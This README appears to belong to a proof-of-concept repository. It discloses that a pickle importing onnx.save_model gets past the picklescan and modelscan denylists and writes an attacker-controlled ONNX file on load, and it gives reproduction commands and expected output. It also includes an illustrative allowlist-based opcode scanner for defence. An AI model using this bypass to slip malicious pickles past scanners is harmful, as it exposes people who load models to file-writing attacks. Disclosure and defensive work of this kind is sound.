# ONNX save_model pickle scanner bypass PoC

This repository contains a minimal malicious pickle that bypasses both `picklescan==1.0.4` and `modelscan==0.8.8`, then writes an attacker-controlled ONNX `ModelProto` during a normal `pickle.load()`.

The pickle uses raw `STACK_GLOBAL` opcodes to resolve a single global:

- `onnx` / `save_model`

It does not use `builtins.getattr`, `os`, `subprocess`, `eval`, or any global currently blocked by picklescan 1.0.4.
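The scanners named above are bypassed because they match imported globals against a denylist, so a file-writing sink such as `onnx.save_model` that is not on the list passes. The defensive counterpart is an allowlist: walk the opcode stream without executing it, recover every `GLOBAL` / `STACK_GLOBAL` reference, and refuse anything the expected framework does not need. The following is an added example for this README, not code from this repository or from picklescan/modelscan; the allowlist contents, the `BENIGN` sample and the hand-assembled `SUSPECT` sample (which only resolves the global and stops, calling nothing) are constructed for illustration.

```python
import collections
import io
import pickle
import pickletools

# Allowlist of (module, name) pairs this scanner accepts. Constructed for the
# example; a real deployment derives it from the framework whose checkpoints
# it expects to load.
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
    ("torch._utils", "_rebuild_tensor_v2"),
}

_UNKNOWN = object()   # placeholder for any non-string value on the simulated stack
_MARK = object()      # placeholder for the MARK object
_STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
               "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}
_PUT_OPS = {"PUT", "BINPUT", "LONG_BINPUT"}
_GET_OPS = {"GET", "BINGET", "LONG_BINGET"}


def _apply_generic(op, stack):
    """Approximate the stack effect of any other opcode from pickletools'
    own stack_before / stack_after descriptions (values become _UNKNOWN)."""
    before = op.stack_before
    if pickletools.markobject in before:
        while stack and stack[-1] is not _MARK:   # drop the slice above the mark
            stack.pop()
        if stack:
            stack.pop()                           # the mark itself
        fixed = before.index(pickletools.markobject)  # items that sit below the mark
    else:
        fixed = len(before)
    for _ in range(fixed):
        if stack:
            stack.pop()
    stack.extend(_UNKNOWN for _ in op.stack_after)


def referenced_globals(data: bytes):
    """Return every (module, name) the pickle would import, in stream order.

    Walks the opcodes with pickletools.genops and keeps a partial stack and
    memo so STACK_GLOBAL operands are recovered whether they were pushed
    directly or fetched back from the memo. Nothing in the pickle runs.
    """
    stack, memo, found = [], {}, []
    for op, arg, _pos in pickletools.genops(io.BytesIO(data)):
        name = op.name
        if name == "GLOBAL":                      # protocol <= 3 form, arg is "module name"
            module, qualname = arg.split(" ", 1)
            found.append((module, qualname))
            stack.append(_UNKNOWN)
        elif name == "STACK_GLOBAL":              # protocol 4+: operands come from the stack
            qualname = stack.pop() if stack else _UNKNOWN
            module = stack.pop() if stack else _UNKNOWN
            if isinstance(module, str) and isinstance(qualname, str):
                found.append((module, qualname))
            else:                                 # unresolvable operands are reported, never ignored
                found.append(("<unresolved>", "<unresolved>"))
            stack.append(_UNKNOWN)
        elif name in _STRING_OPS:
            stack.append(arg)
        elif name == "MARK":
            stack.append(_MARK)
        elif name == "MEMOIZE":                   # memo[len(memo)] = top of stack
            memo[len(memo)] = stack[-1] if stack else _UNKNOWN
        elif name in _PUT_OPS:
            memo[arg] = stack[-1] if stack else _UNKNOWN
        elif name in _GET_OPS:
            stack.append(memo.get(arg, _UNKNOWN))
        else:
            _apply_generic(op, stack)
    return found


def scan_pickle(data: bytes, allowed=ALLOWED_GLOBALS):
    """Return the globals that are not on the allowlist; an empty list means clean."""
    return [g for g in referenced_globals(data) if g not in allowed]


# Constructed samples: an ordinary protocol-4 pickle of an OrderedDict, and a
# hand-assembled opcode sequence that resolves the global named in this README
# via STACK_GLOBAL and then stops without calling anything.
BENIGN = pickle.dumps(collections.OrderedDict(a=1), protocol=4)
SUSPECT = (b"\x80\x04"              # PROTO 4
           b"\x8c\x04onnx"          # SHORT_BINUNICODE "onnx"
           b"\x8c\x0asave_model"    # SHORT_BINUNICODE "save_model"
           b"\x93"                  # STACK_GLOBAL
           b".")                    # STOP

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("suspect", SUSPECT)):
        bad = scan_pickle(blob)
        verdict = "clean" if not bad else f"BLOCK {bad}"
        print(f"{label}: globals={referenced_globals(blob)} -> {verdict}")
```

Run it and the benign checkpoint is accepted while the suspect stream is reported as `[('onnx', 'save_model')]`, even though no entry for `onnx` exists in any denylist. An allowlist also turns every new framework sink into a policy decision rather than a scanner release, which is the property the denylist scanners above lack; the stack simulation is deliberately conservative and reports any `STACK_GLOBAL` whose operands it cannot resolve as a finding.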
## Reproduce

```bash
python3 -m venv /tmp/onnx-save-model-scanner-bypass-venv
/tmp/onnx-save-model-scanner-bypass-venv/bin/python -m pip install --upgrade pip
/tmp/onnx-save-model-scanner-bypass-venv/bin/python -m pip install -r requirements.txt
/tmp/onnx-save-model-scanner-bypass-venv/bin/python reproduce_onnx_save_model_scanner_bypass.py
```
Expected output:

```
picklescan_clean=True
modelscan_clean=True
load_success=True
marker_exists=True
producer_matches=True
REPRO_OK
```
The marker file is written to:

```
/tmp/mfv_onnx_save_model_scanner_bypass_20260624.onnx
```

Parsing the written file with `onnx.load_model()` returns:

```
producer_name = MFV_ONNX_SAVE_MODEL_SCANNER_BYPASS_20260624
```